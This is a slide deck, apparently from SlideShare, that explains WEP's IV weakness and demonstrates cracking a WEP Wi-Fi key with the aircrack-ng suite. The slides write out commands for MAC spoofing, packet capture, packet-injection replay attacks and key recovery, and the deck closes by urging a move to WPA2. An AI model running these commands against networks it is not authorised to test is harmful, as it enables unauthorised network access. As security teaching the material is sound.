Cracking WEP Secured Wireless Networks


Published on

  • Be the first to comment

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Cracking WEP Secured Wireless Networks

  1. 1. Cracking WEP Secured Wireless Networks Hammam Samara
  2. 2. What is WEP Stands for Wired Equivalent Privacy. 13 years old protocol. (even older than Google!). Several serious weaknesses in this protocol have been identified since the early starts. Can be cracked with readily available software within minutes! I never believed until try it my self! - so this session. Despite that, WEP is still widely in use! and often the first security choice presented to user by router config. tools.
  3. 3. WEP Authentication Two methods of authentication can be used with WEP: Open System authentication After the authentication and association, the client needs to have the right keys. Shared Key authentication. Four-way challenge-response handshake is used. Which way is Stronger ?
  4. 4. How is worksBasic WEP encryption: RC4 keystream XORed with plain-text.
  5. 5. So, Where is the weakness?In the IVs it selves! a 24-bit IV is not long enough to ensure this on a busy network. There is a 50% probability the same IV will repeat after 5000 packets. Network not busy ? We could make it so! ;-) There are ways for an attacker to send packets on the network and thereby stimulate reply packets which can then be inspected to find the key. Now freely available software such as aircrack-ng can crack any WEP key in minutes.
  6. 6. Still Not believe it ? I used to too.
  7. 7. Lets Try itRequirements: BackTrack 3 on CD or USB. Computer with compatible 802.11 wireless card. Wireless Access point or WIFI router using WEP encryption.
  8. 8. Enabling Monitor Mode.Procedure: Boot From Backtrack3 Live CD and open kernal window. First is enabling "Monitor mode" for your wifi card. For Intel PROWireless3945ABG modprobe -r iwl3945 modprobe ipwraw Now Stop the wifi card. iwconfig airmon-ng stop [device] airmon-ng [device] down Change the mac address to a fake one: macchanger --mac 00:11:22:33:44:55 [device] airmong-ng start [device]
  9. 9. Attacking The target.Procedure: Discover all wireless network in range. We will using AiroDump for this purpose. airodump-ng [device] Now Choose a target. airodump-ng -c [channel] -w [filename] --bssid [bssied] [device] Now to speed up the data output:(open another consol) aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55 -e [essid] [devcie] aireply-ng -3 -b [bssid] -h 00:11:22:33:44: 55 [device]
  10. 10. Attacking The target.Procedure: Now if you have enough packets, you can begin the crack. But if not ? use the following command aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:55 [device] This will force the AP to generate more and more packets. Wait after you get > 20,000 packets and start new consol window. aircrack-ng -n 128 -b [bssid] [filename]-01.cap you may also try -n to be 64 bit if cracking fails. Once the Aircrack is done, you will be left with the key!
  11. 11. Now What you could do about it ? Nothing! Just Move to WPA (Wi-Fi Protected Access) wireless security. But while you there switching your security protocols, what about choosing WPA2. For you it is just an option, but actually you are making a big difference for your network crackers.
  12. 12. Thank you For Lestining. And Do not forget to secure your wireless
  13. 13. Materials BackTrack3 ISO File: FTP: Torrent: Step by Step tutorial: Video tutorial: Cracking WEP on Windows: